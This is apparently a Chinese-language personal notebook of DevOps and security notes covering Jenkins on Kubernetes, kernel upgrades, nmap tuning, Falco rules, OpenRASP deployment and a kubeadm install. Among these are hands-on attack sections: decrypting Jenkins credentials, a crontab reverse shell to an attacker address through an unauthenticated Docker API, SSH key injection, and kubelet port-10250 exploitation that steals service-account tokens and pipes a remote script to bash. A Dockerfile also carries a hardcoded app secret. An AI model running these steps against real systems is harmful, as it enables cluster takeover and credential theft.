          resources:
            limits:
              cpu: 1
              memory: 1Gi
            requests:
              cpu: 0.5
              memory: 500Mi
          env:
            - name: LIMITS_MEMORY
              valueFrom:
                resourceFieldRef:
                  resource: limits.memory
                  divisor: 1Mi
            - name: JAVA_OPTS
              # value: -XX:+UnlockExperimentalVMOptions -XX:+UseCGroupMemoryLimitForHeap -XX:MaxRAMFraction=1 -XshowSettings:vm -Dhudson.slaves.NodeProvisioner.initialDelay=0 -Dhudson.slaves.NodeProvisioner.MARGIN=50 -Dhudson.slaves.NodeProvisioner.MARGIN0=0.85
              value: -Duser.timezone=Asia/Shanghai -Xmx$(LIMITS_MEMORY)m -XshowSettings:vm -Dhudson.slaves.NodeProvisioner.initialDelay=0 -Dhudson.slaves.NodeProvisioner.MARGIN=50 -Dhudson.slaves.NodeProvisioner.MARGIN0=0.85
          volumeMounts:
            - name: jenkins-home
              mountPath: /var/jenkins_home
            - name: dockersock
              mountPath: /var/run/docker.sock
          livenessProbe:
            httpGet:
              path: /login
              port: 8080
            initialDelaySeconds: 60
            timeoutSeconds: 5
            failureThreshold: 12 # ~2 minutes
          readinessProbe:
            httpGet:
              path: /login
              port: 8080
            initialDelaySeconds: 60
            timeoutSeconds: 5
            failureThreshold: 12 # ~2 minutes
      volumes:
      - name: jenkins-home
        persistentVolumeClaim:
          claimName: jenkins-home
      - name: dockersock
        hostPath:
          path: /var/run/docker.sock
      securityContext:
        fsGroup: 1000

在更新pod

# kubectl apply -f jenkins-statefulset.yaml

参考:
https://hyrepo.com/tech/kubernetes-jenkins/#Docker-in-Docker

jenkins凭证解密

前提

需要可以执行script

获得加密后的凭据

通过访问凭据->系统->全局凭据->某个凭据->更新来查看加密后的凭据
image

解密

点击系统管理->命令脚本行,输入如下代码,即可查看密码

println(hudson.util.Secret.fromString('xxxxxxxxxxxxxxxxxxxx').getPlainText())

或者

println(hudson.util.Secret.decrypt("xxxxxxxxxxxxxxx"))

image

参考:
https://fortynorthsecurity.com/blog/the-security-of-devsecops-jenkins/

如何把centos内核升级成指定版本

  1. 查看当前系统安装了几个内核版本
rpm -qa|grep -i kernel-3.10

image

  1. 谷歌搜索并下载类似如下命名的三个文件:
    kernel-3.10.0-229.el7.x86_64.rpm
    kernel-tools-3.10.0-229.el7.x86_64.rpm
    kernel-tools-libs-3.10.0-229.el7.x86_64.rpm

  2. 依次安装这三个文件:

yum install kernel-tools-3.10.0-229.el7.x86_64.rpm

如果安装失败就用rpm强制安装

rpm -ivh --force kernel-tools-3.10.0-229.el7.x86_64.rpm

然后查看安装成功没有:
image

  1. 谷歌下载并安装kernel-devel文件以免编译内核错误
yum install kernel-devel-3.10.0-229.el7.x86_64.rpm
  1. 重启检查更新是否成功

缩短nmap扫描时间

因为之前使用masscan+nmap的扫描方式产生漏报太多了,所以后来琢磨单单使用nmap来扫的话,时间上是否能接受?

首先看看masscan+nmap扫描一个【c段(192.168.1.1-192.168.1.255)+1-65535端口】所用的时间,基本上在22分钟左右:
image

再看看使用以下参数扫描一个ip所用的时间大概在89秒左右:
nmap -sV 192.168.xxx.31 -p1-65535
image
image

接着添加T4参数看看速度是否有变化:
image

可以看到也是89秒左右,接着继续添加--version-intensity 4参数:
image

可以看到速度缩短到43秒左右,但是带来的影响是有些指纹识别不出来,如下图:
image

这就需要分析哪些协议没识别出来,然后手动修改,首先在/usr/share/nmap/nmap-service-probes里查找rmiregistry,然后把rarity的值改成4就行了
image

但是有些指纹并没有rarity,如:jdwp
image

这时候可以通过grep -r "Java Debug Wire Protocol" /usr/share/nmap/查找rarity的判断在哪个文件,后来找到原来在/usr/share/nmap/scripts/jdwp-version.nse文件里,修改成4,这样就可以--version-intensity 4的时候也识别出来了
image
image

最后这样修改完后,仅仅使用nmap扫描,时间大概在7分钟左右
image

使用apscheduler的一个坑

起因

之前使用apscheduler+flask跑定时任务,刚开始一段时间内一切正常,后来某天查看定时任务的时候,发现任务消失了,这让人感到非常困惑。

原因

之后加了大量logging记录日志,发现了一个错误:

[2019-12-12 Thursday 15:00] [INFO] Scheduler started
[2019-12-12 Thursday 15:00] [DEBUG] Looking for jobs to run
[2019-12-12 Thursday 15:00] [ERROR] Unable to restore job "test_job" -- removing it
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/site-packages/apscheduler/jobstores/mongodb.py", line 128, in _get_jobs
    jobs.append(self._reconstitute_job(document['job_state']))
  File "/usr/local/lib/python2.7/site-packages/apscheduler/jobstores/mongodb.py", line 117, in _reconstitute_job
    job.__setstate__(job_state)
  File "/usr/local/lib/python2.7/site-packages/apscheduler/job.py", line 272, in __setstate__
    self.func = ref_to_obj(self.func_ref)
  File "/usr/local/lib/python2.7/site-packages/apscheduler/util.py", line 305, in ref_to_obj
    raise LookupError('Error resolving reference %s: could not import module' % ref)
LookupError: Error resolving reference jobs:job1: could not import module
[2019-12-12 Thursday 15:00] [DEBUG] Next wakeup is due at 2019-12-13 08:21:05.380000+08:00 (in 62419.929130 seconds)
[2019-12-12 Thursday 15:00] [INFO]  * Running on http://0.0.0.0:8088/ (Press CTRL+C to quit)

从错误信息看到,因为无法还原job,然后把它删了。。。。。。那为什么还原job呢?我查看数据库发现有这个job呀,为什么不能还原?而且不单单有这个job,还有其他程序调用apscheduler添加的job。接着查看调试信息的时候发现一个奇怪的情况,数据库里有A程序调用aps添加的任务1,应执行的时间是a1。还有B程序调用aps添加的任务2,应执行的时间的b2。但现在在A程序上的调试信息里看到的时间确是b2,后来想了想,出现这种情况可能是因为任务1和任务2都在一个库的一个表里,所以导致A程序调用了任务2,然后调用失败删除了相应的job。

解决

网上所有教程和相关问题都没说过这种情况,相关示例也没有说可以自定义job库和表,所以出现了一个程序使用aps的时候没有问题,但是两个程序都使用的时候出现了问题,解决方法就是一个程序使用一个表就可以了,如下:
image

如何把Ubuntu升级成指定的内核版本

之前安装yulong的时候,需要根据不同的内核版本来重新编译驱动,但是网上搜索centos或者Ubuntu的下载地址的时候,都是给出发行版本的信息,怎么根据发行版本找到对应的内核版本呢?以Ubuntu为例,假设要搭建一个内核版本是4.4.0-134-generic的环境,首先:

1.wiki上查找发型版本和内核版本的对应关系,可以看到4.4内核版本对应的是16.04 LTS
image

2. 因为有些老版本官网已经没有了,所以到Old Ubuntu Releases下载对应版本并安装
image

3. 安装好后,查看内核版本发现是 4.4.0-116-generic
image

4. 这和需要的 4.4.0-134-generic 版本还不一样,接着开始升级指定内核,先用命令安装相关软件包:

apt-get install -y linux-image-4.4.0-134-generi

然后重启,在bios页面过去后,按esc就可以选择指定内核启动了(tips:在输入【apt-get install -y linux-image-4】后,可以重复按tab键,确认是否有想要安装的内核版本)
image

5. 最后安装一些头文件,编译驱动的时候会用到

apt-get install linux-headers-$(uname -r)

6. 总结:安装指定内核版本,需要先安装内核主次版本号对应的发行版本,接着在使用apt-get升级成指定内核版本,但是apt-get不能跨主版本升级,例如:安装4.4.0-134-generic,你下了一个内核是4.2的系统镜像安装,是不能从4.2升级到4.4的。 之前说的有些错误,应该是在谷歌上搜索指定内核的关键字,然后通过搜索出来的内容查看内核属于哪个发行版本,再下载对应的发行版本通过apt安装
image

使用helm部署falco

部署

使用helm部署falco,推荐把日志格式化成json,这样日志信息会比较详细

# helm install --name falco --set ebpf.enabled=true,falco.jsonOutput=true,set image.tag=0.22.0 stable/falco

从集群删除

# helm delete --purge falco

出现CrashLoopBackOff可能是内核不匹配
image

检查日志进一步确认是不是内核问题
image

升级目标节点内核后重启,问题解决

yum install kernel
yum -y install kernel-devel-$(uname -r)

image

使用自定义规则

# cat custom_rules.yaml 
customRules:
  custom_rules.yaml: |- 
    - rule: Unauthorized process
      desc: There is a running process not described in the base template
      condition: spawned_process and container and proc.args contains "serviceaccount"
      output: Unauthorized process (%proc.cmdline) running in (%container.id)
      priority: ERROR
      tags: [process]
    - list: safe_etc_dirs
      items: [/etc/titanagent]
# helm upgrade falco -f custom_rules.yaml stable/falco

查看日志可以看到自定义规则被加载

image

如何去除误报

分析日志发现有如下误报,下面谈谈如何修改规则去除误报

20:46:45.519621929: Warning Sensitive file opened for reading by non-trusted program (user=<NA> program=titanagent command=titanagent -d file=/etc/shadow parent=<NA> gparent=<NA> ggparent=<NA> gggparent=<NA> container_id=host image=<NA>) k8s.ns=<NA> k8s.pod=<NA> container=host k8s.ns=<NA> k8s.pod=<NA> container=host k8s.ns=<NA> k8s.pod=<NA> container=host

定位规则

首先从误报信息里提取关键字,如:non-trusted,然后到falco的规则文件falco_rules.yaml里查找,看下这条规则是如何编写的,找到如下:

- rule: Read sensitive file untrusted
  desc: >
    an attempt to read any sensitive file (e.g. files containing user/password/authentication
    information). Exceptions are made for known trusted programs.
  condition: >
    sensitive_files and open_read
    and proc_name_exists
    and not proc.name in (user_mgmt_binaries, userexec_binaries, package_mgmt_binaries,
     cron_binaries, read_sensitive_file_binaries, shell_binaries, hids_binaries,
     vpn_binaries, mail_config_binaries, nomachine_binaries, sshkit_script_binaries,
     in.proftpd, mandb, salt-minion, postgres_mgmt_binaries)
    and not cmp_cp_by_passwd
    and not ansible_running_python
    and not proc.cmdline contains /usr/bin/mandb
    and not run_by_qualys
    and not run_by_chef
    and not run_by_google_accounts_daemon
    and not user_read_sensitive_file_conditions
    and not perl_running_plesk
    and not perl_running_updmap
    and not veritas_driver_script
    and not perl_running_centrifydc
    and not runuser_reading_pam
  output: >
    Sensitive file opened for reading by non-trusted program (user=%user.name program=%proc.name
    command=%proc.cmdline file=%fd.name parent=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4] container_id=%container.id image=%container.image.repository)
  priority: WARNING
  tags: [filesystem, mitre_credential_access, mitre_discovery]

分析规则

找到规则后,分析误报日志里的信息,找出独特的信息作为白名单。如:program=titanagent。接着由于program=%proc.name,所以我们分析规则里proc.name的相关信息:

not proc.name in (user_mgmt_binaries, userexec_binaries, package_mgmt_binaries,
     cron_binaries, read_sensitive_file_binaries, shell_binaries, hids_binaries,
     vpn_binaries, mail_config_binaries, nomachine_binaries, sshkit_script_binaries,
     in.proftpd, mandb, salt-minion, postgres_mgmt_binaries)

这个语句大概的意思就是如果proc.name不属于括号里的内容就告警,所以只要把titanagent加入括号里即可。而括号里的都属于变量,我们找一个合适的变量加进去,如:hids_binaries。在falco_rules.yaml里搜索hids_binaries,找到hids_binaries的定义如下:

- list: hids_binaries
  items: [aide]

添加规则

最后在我们的custom_rules.yaml里加入如下信息:

customRules:
  custom_rules.yaml: |- 
    - rule: Unauthorized process
      desc: There is a running process not described in the base template!!!!!!!!!!!!!!!!!!!!
      condition: spawned_process and container and proc.args contains "serviceaccount"
      output: Unauthorized process (%proc.cmdline) running in (%container.id)
      priority: ERROR
      tags: [process]
    - list: safe_etc_dirs
      append: true
      items: [/etc/titanagent]
    - list: hids_binaries
      append: true
      items: [titanagent]

参考:
https://hub.helm.sh/charts/stable/falco/1.0.10

部署百度iast

环境要求

首先需要三个数据库,mysql、Elasticsearch和MongoDB,es用来存储报警和统计信息,mongo用来存储应用、账号密码等信息。
目前对数据库的要求是:

  • MongoDB版本大于等于3.6
  • ElasticSearch版本大于等于5.6,小于7.0

添加mongo用户

mongodb和es安装过程省略,测试可以用docker

> use openrasp
> db.createUser({user:'iast',pwd:'123456', roles:["readWrite", "dbAdmin"]})

安装管理后台

# wget https://packages.baidu.com/app/openrasp/release/1.3.2/rasp-cloud.tar.gz
# tar -zxvf rasp-cloud.tar.gz
# cd rasp-cloud-2020-03-25/
# vim conf/app.conf

修改app.conf文件里mongo和es的连接配置
image

最后启动程序:

# ./rasp-cloud

或者

# ./rasp-cloud -d //后台运行

IAST插件安装

# wget https://packages.baidu.com/app/openrasp/openrasp-iast-latest -O /usr/bin/openrasp-iast

配置MYSQL数据库,建立名为openrasp的数据库,并且为rasp@%授权,这里示例密码为rasp123,请自行修改为强密码。使用root账号连接mysql并执行如下语句:

DROP DATABASE IF EXISTS openrasp;
CREATE DATABASE openrasp default charset utf8mb4 COLLATE utf8mb4_general_ci;
grant all privileges on openrasp.* to 'rasp'@'%' identified by 'rasp123';
grant all privileges on openrasp.* to 'rasp'@'localhost' identified by 'rasp123';

点击应用管理->添加,应用名称和应用备注填入iast,应用语言选择java,点击保存
image

在云控(8086那个端口)右上角添加主机->Fuzz工具安装,从第三步开始,注意改mysql地址:
image

配置管理后台

打开云控管理后台http://ip:8086,输入默认用户名密码:openrasp/admin@123
在插件管理中选择推送iast插件。
image

接着在防护设置->Fuzz服务器地址里填入openrast-iast所监听的URL,端口使用默认,一定要改IP,不然会发现不到扫描任务:
image

最后在系统设置->通用设置中,修改检测配置

  • 单个hook点最大执行时间设置为5000
  • 开始文件过滤器:当文件不存在时不调用检测插件设置为关闭
  • LRU大小设置为0
    点击保存

安装agent

下载webgoat.jar文件
链接:https://pan.baidu.com/s/1du-4XVlAfvk7S6q-8VF7gA
提取码:4261

新建Dockerfile

# cat Dockerfile
FROM openjdk:11.0.1-jre-slim-stretch

ARG webgoat_version=v8.0.0-SNAPSHOT

RUN \
  apt-get update && apt-get install && \
  useradd --home-dir /home/webgoat --create-home -U webgoat
ADD https://packages.baidu.com/app/openrasp/release/1.3.2/rasp-java.tar.gz /tmp
RUN cd /tmp \
    && tar -xf rasp-java.tar.* \
    && mv rasp-*/rasp/ /rasp/ \
    && rm -f rasp-java.tar.gz

RUN echo "cloud.enable: true" >> /rasp/conf/openrasp.yml \
    && echo "cloud.backend_url: http://192.168.47.105:8086/" >> /rasp/conf/openrasp.yml \
    && echo "cloud.app_id: cbaf06097b812f6b6c3ad3269812b2f01f3efb50" >> /rasp/conf/openrasp.yml \
    && echo "cloud.app_secret: 45BvWs0K3vZ0iW10Fm52BD1DcPe4ElIn38e3s6JdxE8" >> /rasp/conf/openrasp.yml

COPY webgoat-server-8.0.0.M25.jar /home/webgoat/webgoat.jar
RUN mkdir -p /rasp/logs/rasp/
EXPOSE 8080

ENTRYPOINT ["java", "--add-opens","java.base/jdk.internal.loader=ALL-UNNAMED","-Djava.security.egd=file:/dev/./urandom","-javaagent:/rasp/rasp.jar", "-jar", "/home/webgoat/webgoat.jar"]
CMD ["--server.port=8080", "--server.address=0.0.0.0"]

编译运行镜像

# docker build -t webgoat:1 .
# docker run -p 8080:8080 webgoat:1

测试效果

在云控上点击主机管理,出现agent,说明agent部署成功
image

访问http://ip:8080/WebGoat,随便操作一些功能,可以看到已经检测出漏洞
image

从docker未授权漏洞到获得k8s master的访问权

docker未授权攻击步骤

没什么好说的,和redis的利用方式很像

  • 方式一
# docker  -H tcp://ip:2375 run -it -v /etc:/mnt centos /bin/bash
# cp /mnt/crontab /mnt/crontab.bak
# echo -e "* * * * * root bash -i >& /dev/tcp/172.1.1.1/8008 0>&1\n" >> /mnt/crontab
  • 方式二
# docker -H tcp://ip:2375 run -it -v /root/.ssh/:/mnt centos /bin/bash
# ssh-keygen -t rsa -P '' //攻击者在本地生成密钥
# echo "xxxx" >> /mnt/authorized_keys //把密钥写入远程docker
# ssh ip //连接

查看是否是k8s节点

  • 首先查看是否是k8s master节点
# docker -H 1.1.1.1 ps| grep apiserver
  • 反弹获得shell后,再查看主机是否是k8s节点
# netstat -an | grep 6443 //查看是否有和6443连接,同时可以找到master的ip
# ps -ef  | grep kubelet //查看是否存在kubelet

复制配置文件

找到kubelet.conf文件

image

/etc/kubernetes/kubelet.conf的内容复制下来,并把里面的pem文件也一起复制下来。如果user是default-auth的话,权限不会太大

image

一共三个文件:kubelet.conf、kubelet-client-current.pem和kubelet-client-current.pem。

连接远程6443

# cat hacker.conf 
apiVersion: v1
clusters:
- cluster:
    certificate-authority-data: xxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    server: https://k8s-nginx-01.xxx.cloud:6443  //改成需要连接的master的ip
  name: default-cluster
contexts:
- context:
    cluster: default-cluster
    namespace: default
    user: default-auth
  name: default-context
current-context: default-context
kind: Config
preferences: {}
users:
- name: default-auth
  user:
    client-certificate: client.pem
    client-key: client.pem

# kubectl --kubeconfig hacker.conf get pods
NAME          READY   STATUS             RESTARTS   AGE
lxcfs-qhxqt   0/1     CrashLoopBackOff   11725      41d

然而并没有什么卵用,这个用户权限太低,只能一些命令

image

换个姿势

随便进入某个pod,然后查看token

image

接着使用命令kubectl --insecure-skip-tls-verify=true --server="https://192.168.1.1:6443" --token="eyJ....." get secrets --all-namespaces连接试试,发现还是权限不足

image

通过一系列的尝试后,发现k8s_agent_cattle-node-agent-fbgcq_cattle-system的pod权限比较大,下一步便是通过创建pod来挂载目录,然后用crontab来获得shell了
image

攻击k8s的10250端口

1、确定主机是否可以利用,访问https://ip:10250/pods,出现如下数据表示可以利用:
image
2、执行【curl -k -XPOST "https://k8s-node-1:10250/run/%namespace%/%pod_name%/%container_name%" -d "cmd=ls -la /"】,即可执行命令:
image
3、现在问题变成了如何确定namespace、pod_name、container_name,访问https://ip:10250/pods,并查找selfLink,会有一个类似【/api/v1/namespaces/test1/pods/web-docker-594dd9789f-fc9d9】的值,其中namespaces就是后面的test1,同理pods就是后面的web-docker-594dd9789f-fc9d9。如果执行失败,可以看看phase的状态是不是fail,是的话就换一个phase是running的再试试。
image
4、获得token,curl -k -XPOST "https://ip:10250/run/cattle-system/cattle-cluster-agent-549fc45d6f-lf7hp/cluster-register" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"
image
image
5、如果不在这个位置,可用mount命令来查找:
image
6、接下来可以尝试获得master(api server)的权限,默认情况下,api server开发的端口为6443,所以扫描同个网段开放6443的主机来挨个尝试,除了这种方法,还可以尝试执行env命令来查看是否有api server的地址或者其他敏感信息:
image
7、执行命令kubectl --insecure-skip-tls-verify=true --server="https://ip:6443" --token="eyJhbG......" get secrets --all-namespaces -o json,如果提示【error: You must be logged in to the server (Unauthorized)】就是token和api server不匹配。
image

获得master权限

1、获得node(开放10250端口主机)的shell:
192.168.84.158:88是入侵者的web服务,写了反弹shell:
image

curl --insecure -v -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" -X POST "https://192.168.4.68:10250/exec/ingress-nginx/nginx-ingress-controller-6f5cbc5444-nkdg6/nginx-ingress-controller?command=/bin/bash&command=-c&command=curl+192.168.84.158:88+|+bash&input=1&output=1&tty=1"
不行就试试下面的:
curl --insecure -v -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" -X POST "https://192.168.4.68:10250/exec/ingress-nginx/nginx-ingress-controller-6f5cbc5444-nkdg6/nginx-ingress-controller?command=/bin/sh&command=-c&command=curl+192.168.84.158:88+|+sh&input=1&output=1&tty=1"
image

[root@localhost ~]# curl --insecure -v -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" -X POST "https://192.168.4.68:10250/exec/ingress-nginx/nginx-ingress-controller-6f5cbc5444-nkdg6/nginx-ingress-controller?command=/bin/bash&command=-c&command=curl+192.168.84.158:88+|+bash&input=1&output=1&tty=1"
* About to connect() to 192.168.4.68 port 10250 (#0)
*   Trying 192.168.4.68...
* Connected to 192.168.4.68 (192.168.4.68) port 10250 (#0)
* Initializing NSS with certpath: sql:/etc/pki/nssdb
* skipping SSL peer certificate verification
* SSL connection using TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
* Server certificate:
* 	subject: CN=192.168.4.68@1544518989
* 	start date: 12月 11 09:03:09 2018 GMT
* 	expire date: 12月 11 09:03:09 2019 GMT
* 	common name: 192.168.4.68@1544518989
* 	issuer: CN=192.168.4.68@1544518989
> POST /exec/ingress-nginx/nginx-ingress-controller-6f5cbc5444-nkdg6/nginx-ingress-controller?command=/bin/bash&command=-c&command=curl+192.168.84.158:88+|+bash&input=1&output=1&tty=1 HTTP/1.1
> User-Agent: curl/7.29.0
> Host: 192.168.4.68:10250
> Accept: */*
> X-Stream-Protocol-Version: v2.channel.k8s.io
> X-Stream-Protocol-Version: channel.k8s.io
> 
< HTTP/1.1 302 Found
< Location: /cri/exec/zEKYcaZt  //查看执行结果
< Date: Wed, 07 Aug 2019 06:01:42 GMT
< Content-Length: 0
< Content-Type: text/plain; charset=utf-8
< 
* Connection #0 to host 192.168.4.68 left intact
[root@localhost ~]# 

2、测试使用token是否能连接到master
在安装了docker的机器上执行:
[root@localhost ~]# docker run -it --rm joshgubler/wscat -c "https://192.168.4.68:10250/cri/exec/zEKYcaZt" --no-check
image
在反弹的shell里查看master的内部ip,还有是否存在token:
image
执行,查看是否报错

[root@localhost ~]# TOKEN_VALUE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
[root@localhost ~]# curl -k --cacert /var/run/secrets/kubernetes.io/serviceaccount/ca.crt -H  "Authorization: Bearer $TOKEN_VALUE" https://10.0.0.1:443/api/v1/pods

3、创建一个可以反弹的pod

参考:
https://www.lijiaocn.com/%E9%97%AE%E9%A2%98/2018/07/20/kubernetes-docker-cpu-high.html
https://segmentfault.com/a/1190000002937665
http://blog.allen-mo.com/2019/04/29/k8s-security-serviceaccount/
https://stackoverflow.com/questions/51176283/how-to-create-pod-from-rest-api
https://raesene.github.io/blog/2016/10/08/Kubernetes-From-Container-To-Cluster/
http://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250.html
https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet/

centos7单机kubernetes安装

[root@localhost ~]# hostnamectl set-hostname  k8s-master
[root@k8s-master ~]# reboot
[root@k8s-master ~]# yum -y install policycoreutils-python*
[root@k8s-master ~]# wget http://ftp.riken.jp/Linux/cern/centos/7/extras/x86_64/Packages/container-selinux-2.68-1.el7.noarch.rpm
[root@k8s-master ~]# rpm -ivh container-selinux-2.68-1.el7.noarch.rpm
准备中...                          ################################# [100%]
正在升级/安装...
   1:container-selinux-2:2.68-1.el7   ################################# [100%]
[root@k8s-master ~]# yum install -y libltdl.so* pigz* bridge-utils*
[root@k8s-master ~]# curl -sSL https://get.docker.com/ | sudo sh
[root@k8s-master ~]# vim /etc/yum.repos.d/kubernetes.repo
[root@k8s-master ~]# cat /etc/yum.repos.d/kubernetes.repo
[kuberneten]
name=Kubernetes
baseurl=http://mirrors.aliyun.com/kubernetes/yum/repos/kubernetes-el7-x86_64
enabled=1
gpgcheck=0
repo_gpgcheck=0
gpgkey=http://mirrors.aliyun.com/kubernetes/yum/doc/yum-key.gpg
        http://mirrors.aliyun.com/kubernetes/yum/doc/rpm-package-key.gpg

[root@k8s-master ~]# yum makecache
[root@k8s-master ~]# swapoff -a
[root@k8s-master ~]# sed -i '/ swap / s/^\(.*\)$/#\1/g' /etc/fstab
[root@k8s-master ~]# echo "net.bridge.bridge-nf-call-iptables=1">> /etc/sysctl.conf
[root@k8s-master ~]# echo "1" > /proc/sys/net/ipv4/ip_forward
[root@k8s-master ~]# modprobe br_netfilter
[root@k8s-master ~]# sysctl -p
[root@k8s-master ~]# yum install -y kubelet kubeadm kubectl kubernetes-cni
[root@k8s-master ~]# systemctl enable docker && systemctl start docker
Created symlink from /etc/systemd/system/multi-user.target.wants/docker.service to /usr/lib/systemd/system/docker.service.
[root@k8s-master ~]# systemctl enable kubelet && systemctl start kubelet
Created symlink from /etc/systemd/system/multi-user.target.wants/kubelet.service to /usr/lib/systemd/system/kubelet.service.
[root@k8s-master ~]# 
[root@k8s-master ~]# kubeadm config images list  //查看所需镜像,并下载相应版本
W0802 14:50:44.611344    1866 version.go:98] could not fetch a Kubernetes version from the internet: unable to get URL "https://dl.k8s.io/release/stable-1.txt": Get https://dl.k8s.io/release/stable-1.txt: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers)
W0802 14:50:44.611436    1866 version.go:99] falling back to the local client version: v1.15.1
k8s.gcr.io/kube-apiserver:v1.15.1
k8s.gcr.io/kube-controller-manager:v1.15.1
k8s.gcr.io/kube-scheduler:v1.15.1
k8s.gcr.io/kube-proxy:v1.15.1
k8s.gcr.io/pause:3.1
k8s.gcr.io/etcd:3.3.10
k8s.gcr.io/coredns:1.3.1
[root@k8s-master ~]# docker pull k8s.gcr.io/kube-apiserver:v1.15.1 && docker pull k8s.gcr.io/kube-controller-manager:v1.15.1 && docker pull k8s.gcr.io/kube-scheduler:v1.15.1 && docker pull k8s.gcr.io/kube-proxy:v1.15.1 && docker pull k8s.gcr.io/pause:3.1 && docker pull k8s.gcr.io/etcd:3.3.10 && docker pull k8s.gcr.io/coredns:1.3.1
[root@k8s-master ~]# kubeadm init   --pod-network-cidr=10.244.0.0/16
[root@k8s-master ~]# mkdir -p $HOME/.kube
[root@k8s-master ~]# cp -i /etc/kubernetes/admin.conf $HOME/.kube/config
[root@k8s-master ~]# chown $(id -u):$(id -g) $HOME/.kube/config
[root@k8s-master ~]# kubectl taint nodes --all node-role.kubernetes.io/master-  //Master节点默认不参与工作负载,需执行命令来解除限制
node/k8s-master untainted
[root@k8s-master ~]# docker pull quay.io/coreos/flannel:v0.10.0-amd64  //安装cni 网络插件
v0.10.0-amd64: Pulling from coreos/flannel
ff3a5c916c92: Pull complete 
8a8433d1d437: Pull complete 
306dc0ee491a: Pull complete 
856cbd0b7b9c: Pull complete 
af6d1e4decc6: Pull complete 
Digest: sha256:88f2b4d96fae34bfff3d46293f7f18d1f9f3ca026b4a4d288f28347fcb6580ac
Status: Downloaded newer image for quay.io/coreos/flannel:v0.10.0-amd64
[root@k8s-master ~]# 
[root@k8s-master ~]# mkdir -p /etc/cni/net.d/
[root@k8s-master ~]# vi /etc/cni/net.d/10-flannel.conf
[root@k8s-master ~]# cat /etc/cni/net.d/10-flannel.conf
{"name":"cbr0","type":"flannel","delegate": {"isDefaultGateway": true}}
[root@k8s-master ~]# mkdir /usr/share/oci-umount/oci-umount.d -p
[root@k8s-master ~]# mkdir /run/flannel/
[root@k8s-master ~]# kubectl apply -f https://raw.githubusercontent.com/coreos/flannel/v0.9.1/Documentation/kube-flannel.yml
clusterrole.rbac.authorization.k8s.io/flannel created
clusterrolebinding.rbac.authorization.k8s.io/flannel created
serviceaccount/flannel created
configmap/kube-flannel-cfg created
daemonset.extensions/kube-flannel-ds created
[root@k8s-master ~]# kubectl get nodes
NAME         STATUS   ROLES    AGE     VERSION
k8s-master   Ready    master   8m14s   v1.15.1
[root@k8s-master ~]# vim dig.yml  //测试coredns功能
[root@k8s-master ~]# cat dig.yml 
apiVersion: v1
kind: Pod
metadata:
  name: dig
  namespace: default
spec:
  containers:
  - name: dig
    image:  docker.io/azukiapp/dig
    command:
      - sleep
      - "3600"
    imagePullPolicy: IfNotPresent
  restartPolicy: Always
[root@k8s-master ~]# kubectl apply -f dig.yml
pod/dig created
[root@k8s-master ~]# 
[root@k8s-master ~]# 
[root@k8s-master ~]# kubectl get pods
NAME   READY   STATUS    RESTARTS   AGE
dig    1/1     Running   0          49s
[root@k8s-master ~]# kubectl exec -ti dig -- nslookup kubernetes  //如有以下返回说明dns安装成功
Server:		10.96.0.10
Address:	10.96.0.10#53

Name:	kubernetes.default.svc.cluster.local
Address: 10.96.0.1

如需加入节点:

[root@localhost ~]# hostnamectl set-hostname  k8s-node1
[root@k8s-node1 ~]# reboot
[root@k8s-node1 ~]# yum -y install policycoreutils-python*
[root@k8s-node1 ~]# wget http://mirror.centos.org/centos/7/extras/x86_64/Packages/container-selinux-2.68-1.el7.noarch.rpm
[root@k8s-node1 ~]# rpm -ivh container-selinux-2.68-1.el7.noarch.rpm
准备中...                          ################################# [100%]
正在升级/安装...
   1:container-selinux-2:2.68-1.el7   ################################# [100%]
[root@k8s-node1 ~]# yum install -y libltdl.so* pigz* bridge-utils*
[root@k8s-node1 ~]# curl -sSL https://get.docker.com/ | sudo sh
[root@k8s-node1 ~]# vim /etc/yum.repos.d/kubernetes.repo
[root@k8s-node1 ~]# cat /etc/yum.repos.d/kubernetes.repo
[kuberneten]
name=Kubernetes
baseurl=http://mirrors.aliyun.com/kubernetes/yum/repos/kubernetes-el7-x86_64
enabled=1
gpgcheck=0
repo_gpgcheck=0
gpgkey=http://mirrors.aliyun.com/kubernetes/yum/doc/yum-key.gpg
        http://mirrors.aliyun.com/kubernetes/yum/doc/rpm-package-key.gpg

[root@k8s-node1 ~]# yum makecache
[root@k8s-node1 ~]# swapoff -a
[root@k8s-node1 ~]# sed -i '/ swap / s/^\(.*\)$/#\1/g' /etc/fstab
[root@k8s-node1 ~]# echo "net.bridge.bridge-nf-call-iptables=1">> /etc/sysctl.conf
[root@k8s-node1 ~]# echo "1" > /proc/sys/net/ipv4/ip_forward
[root@k8s-node1 ~]# modprobe br_netfilter
[root@k8s-node1 ~]# sysctl -p
[root@k8s-node1 ~]# yum install -y kubelet kubeadm kubectl kubernetes-cni
[root@k8s-node1 ~]# systemctl enable docker && systemctl start docker
Created symlink from /etc/systemd/system/multi-user.target.wants/docker.service to /usr/lib/systemd/system/docker.service.
[root@k8s-node1 ~]# systemctl enable kubelet && systemctl start kubelet
Created symlink from /etc/systemd/system/multi-user.target.wants/kubelet.service to /usr/lib/systemd/system/kubelet.service.
[root@k8s-node1 ~]# 
[root@k8s-node1 ~]# mkdir -p /etc/cni/net.d/
[root@k8s-node1 ~]# vi /etc/cni/net.d/10-flannel.conf
[root@k8s-node1 ~]# cat /etc/cni/net.d/10-flannel.conf
{"name":"cbr0","type":"flannel","delegate": {"isDefaultGateway": true}}

在master上查看token:

[root@k8s-master ~]# kubeadm token list  //token已过期
TOKEN                     TTL         EXPIRES                     USAGES                   DESCRIPTION                                                EXTRA GROUPS
giluwm.lzwt5hgbkxjr42wb   <invalid>   2019-08-06T13:45:14+08:00   authentication,signing   The default bootstrap token generated by 'kubeadm init'.   system:bootstrappers:kubeadm:default-node-token
[root@k8s-master ~]# 
[root@k8s-master ~]# 
